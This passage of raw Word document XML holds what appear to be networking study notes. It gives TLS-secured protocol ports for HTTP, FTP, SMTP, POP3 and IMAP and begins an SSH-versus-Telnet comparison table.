        <w:t xml:space="preserve"> is placed in the presentation layer, and it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> encrypts the data that is being sent between different parties. </w:t>
      </w:r>
      <w:r w:rsidR="00D56067">
        <w:t>TLS replaced SSL because TLS is more secure.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2254"/>
        <w:gridCol w:w="2254"/>
        <w:gridCol w:w="2254"/>
        <w:gridCol w:w="2254"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D56067" w14:paraId="28F32C1A" w14:textId="77777777" w:rsidTr="00D56067">
        <w:trPr>
          <w:trHeight w:val="983"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="628BFAD9" w14:textId="77777777" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08948B1F" w14:textId="2D243EDA" w:rsidR="00D56067" w:rsidRPr="00615DE6" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00615DE6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="773C838E" w14:textId="77777777" w:rsidR="00D56067" w:rsidRPr="00615DE6" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="45A9D27E" w14:textId="1F92435A" w:rsidR="00D56067" w:rsidRPr="00615DE6" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00615DE6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Default</w:t>
            </w:r>
            <w:r w:rsidRPr="00615DE6">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00615DE6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E3A38A7" w14:textId="77777777" w:rsidR="00D56067" w:rsidRPr="00615DE6" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1EFD0863" w14:textId="045F11C1" w:rsidR="00D56067" w:rsidRPr="00615DE6" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00615DE6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Secured Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74F943EB" w14:textId="77777777" w:rsidR="00D56067" w:rsidRPr="00615DE6" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C3784EB" w14:textId="1B2F77B6" w:rsidR="00D56067" w:rsidRPr="00615DE6" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00615DE6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Default Port with TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D56067" w14:paraId="5372C32D" w14:textId="77777777" w:rsidTr="00D56067">
        <w:trPr>
          <w:trHeight w:val="986"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13628108" w14:textId="77777777" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="13EF9752" w14:textId="200A04FC" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D56067">
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63C3E9B4" w14:textId="77777777" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="698CEF44" w14:textId="691EF5AD" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F265CA7" w14:textId="77777777" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5EC3F2AC" w14:textId="1304A588" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55A76C06" w14:textId="77777777" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E418AB3" w14:textId="3CCCD91B" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>443</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D56067" w14:paraId="376A2504" w14:textId="77777777" w:rsidTr="00D56067">
        <w:trPr>
          <w:trHeight w:val="863"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70B5E6AA" w14:textId="77777777" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="74B6807E" w14:textId="22B40F26" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10FD341C" w14:textId="77777777" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="186C583D" w14:textId="374C9BAE" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="078973AD" w14:textId="77777777" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F81D662" w14:textId="2D81E525" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>FTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25065A08" w14:textId="77777777" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="030A2640" w14:textId="555AE67D" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>990</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D56067" w14:paraId="73307C1A" w14:textId="77777777" w:rsidTr="00D56067">
        <w:trPr>
          <w:trHeight w:val="852"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="253A4A03" w14:textId="77777777" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E1AD408" w14:textId="569B773D" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="726AD075" w14:textId="77777777" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="664535FC" w14:textId="748376A0" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D6988C3" w14:textId="77777777" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00B83FB4"/>
          <w:p w14:paraId="0834E0CA" w14:textId="4C5FAC80" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>SMTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EEEC92D" w14:textId="77777777" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00B83FB4"/>
          <w:p w14:paraId="6FA0497F" w14:textId="6D29FD7E" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00D56067">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>465</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D56067" w14:paraId="4F49BDA3" w14:textId="77777777" w:rsidTr="00D56067">
        <w:trPr>
          <w:trHeight w:val="857"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D0AC893" w14:textId="77777777" w:rsidR="00615DE6" w:rsidRDefault="00615DE6" w:rsidP="00615DE6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2615F219" w14:textId="1A25F3E8" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00615DE6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>POP3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CDFBCDF" w14:textId="77777777" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00615DE6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="32F57E47" w14:textId="3A954380" w:rsidR="00615DE6" w:rsidRDefault="00615DE6" w:rsidP="00615DE6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="448BC75E" w14:textId="77777777" w:rsidR="00615DE6" w:rsidRDefault="00615DE6" w:rsidP="00615DE6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0EFA316E" w14:textId="728A73DD" w:rsidR="00D56067" w:rsidRDefault="00615DE6" w:rsidP="00615DE6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>POP3S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D6BDC95" w14:textId="77777777" w:rsidR="00615DE6" w:rsidRDefault="00615DE6" w:rsidP="00B83FB4"/>
          <w:p w14:paraId="2F46EEF3" w14:textId="20BA12B1" w:rsidR="00D56067" w:rsidRDefault="00615DE6" w:rsidP="00615DE6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>995</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D56067" w14:paraId="52759361" w14:textId="77777777" w:rsidTr="00D56067">
        <w:trPr>
          <w:trHeight w:val="920"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08A249CF" w14:textId="77777777" w:rsidR="00615DE6" w:rsidRDefault="00615DE6" w:rsidP="00B83FB4"/>
          <w:p w14:paraId="5AFCFC7E" w14:textId="7260DA44" w:rsidR="00D56067" w:rsidRDefault="00615DE6" w:rsidP="00615DE6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>IMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="054CEBA9" w14:textId="77777777" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00615DE6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="366F454A" w14:textId="00325822" w:rsidR="00615DE6" w:rsidRDefault="00615DE6" w:rsidP="00615DE6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26F12DFA" w14:textId="77777777" w:rsidR="00615DE6" w:rsidRDefault="00615DE6" w:rsidP="00615DE6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65C207B7" w14:textId="460773C5" w:rsidR="00D56067" w:rsidRDefault="00615DE6" w:rsidP="00615DE6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>IMAPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15D948D7" w14:textId="77777777" w:rsidR="00615DE6" w:rsidRDefault="00615DE6" w:rsidP="00B83FB4"/>
          <w:p w14:paraId="5FAEDD88" w14:textId="501D79DF" w:rsidR="00D56067" w:rsidRDefault="00615DE6" w:rsidP="00615DE6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>993</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A79C130" w14:textId="7BF4FC4A" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="007FA962" w14:textId="3C91C9E0" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="3FFA75D6" w14:textId="0687616C" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="12B11513" w14:textId="2E822D28" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="530B144C" w14:textId="6B168D5C" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="73356D62" w14:textId="5BD7967C" w:rsidR="00AC2210" w:rsidRDefault="00AC2210" w:rsidP="00AC2210">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78B4F905" w14:textId="51C23D2F" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D"/>
    <w:p w14:paraId="23B22465" w14:textId="042AF4E3" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D"/>
    <w:p w14:paraId="7F0152CC" w14:textId="70D24DFF" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D"/>
    <w:p w14:paraId="4F07336F" w14:textId="624D16A5" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D"/>
    <w:p w14:paraId="426A924E" w14:textId="0D7B966D" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D"/>
    <w:p w14:paraId="59469023" w14:textId="031485EE" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D"/>
    <w:p w14:paraId="4562AE90" w14:textId="75CF9F81" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D"/>
    <w:p w14:paraId="39271CDD" w14:textId="2C8B0DA6" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D"/>
    <w:p w14:paraId="6D975818" w14:textId="621B72CC" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D"/>
    <w:p w14:paraId="520FF378" w14:textId="48FC29FF" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D"/>
    <w:p w14:paraId="0CE3E897" w14:textId="1E5EB13D" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D"/>
    <w:p w14:paraId="31C23678" w14:textId="02B0741C" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D"/>
    <w:p w14:paraId="466319D5" w14:textId="77777777" w:rsidR="004E4F8D" w:rsidRPr="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D"/>
    <w:p w14:paraId="63B233E6" w14:textId="71FC1C78" w:rsidR="00AC2210" w:rsidRDefault="00AC2210" w:rsidP="00AC2210">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc114777214"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Secure Shell (SSH)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="01B8007B" w14:textId="77777777" w:rsidR="00AC2210" w:rsidRDefault="00AC2210" w:rsidP="00AC2210">
      <w:r>
        <w:t xml:space="preserve">SSH was created to securely allows people to connect to another system over the network. It allows you to execute commands on the remote system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD1FD23" w14:textId="77777777" w:rsidR="00AC2210" w:rsidRDefault="00AC2210" w:rsidP="00AC2210">
      <w:r>
        <w:t>Telnet has the same purpose. However, Telnet is outdated and has some drawbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F25AD70" w14:textId="77777777" w:rsidR="00AC2210" w:rsidRDefault="00AC2210" w:rsidP="00AC2210">
      <w:r>
        <w:t>Let me compare between the two services:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3006"/>
      </w:tblGrid>
      <w:tr w:rsidR="004E4F8D" w14:paraId="1BE20C63" w14:textId="77777777" w:rsidTr="004E4F8D">
        <w:trPr>
          <w:trHeight w:val="726"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22BCC7AC" w14:textId="77777777" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="00AC2210"/>
          <w:p w14:paraId="4AE2A29A" w14:textId="3889597E" w:rsidR="004E4F8D" w:rsidRPr="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E4F8D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01F59370" w14:textId="77777777" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="00AC2210"/>
          <w:p w14:paraId="7384D87E" w14:textId="3D871320" w:rsidR="004E4F8D" w:rsidRPr="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E4F8D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57B12924" w14:textId="77777777" w:rsidR="004E4F8D" w:rsidRPr="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4A723EDA" w14:textId="3C4FADE8" w:rsidR="004E4F8D" w:rsidRPr="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E4F8D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E4F8D" w14:paraId="0B3F14B1" w14:textId="77777777" w:rsidTr="004E4F8D">
        <w:trPr>
          <w:trHeight w:val="978"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B81844C" w14:textId="77777777" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4A01E79D" w14:textId="3FBCA2E0" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="004E4F8D">
              <w:t>Operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="461F4DF9" w14:textId="49290DC6" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Uses TCP port 23 and works best with local area networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39FF1E6D" w14:textId="4C27FAFD" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Uses TCP port 22 by default. Easy to change the port number.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E4F8D" w14:paraId="542C7572" w14:textId="77777777" w:rsidTr="004E4F8D">
        <w:trPr>
          <w:trHeight w:val="983"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DD40ED2" w14:textId="77777777" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="00AC2210"/>
          <w:p w14:paraId="0E097CA8" w14:textId="34F04543" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CFFEEE8" w14:textId="7107EED6" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="004E4F8D">
              <w:t>Less secure than SSH, with many vulnerabilities. Difficult to encrypt data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67C78DEF" w14:textId="77777777" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="00AC2210"/>
          <w:p w14:paraId="217D04C3" w14:textId="2262FA2F" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="004E4F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="004E4F8D">
              <w:t>Highly secure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E4F8D" w14:paraId="4B1CC5E2" w14:textId="77777777" w:rsidTr="004E4F8D">
        <w:trPr>
          <w:trHeight w:val="1022"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
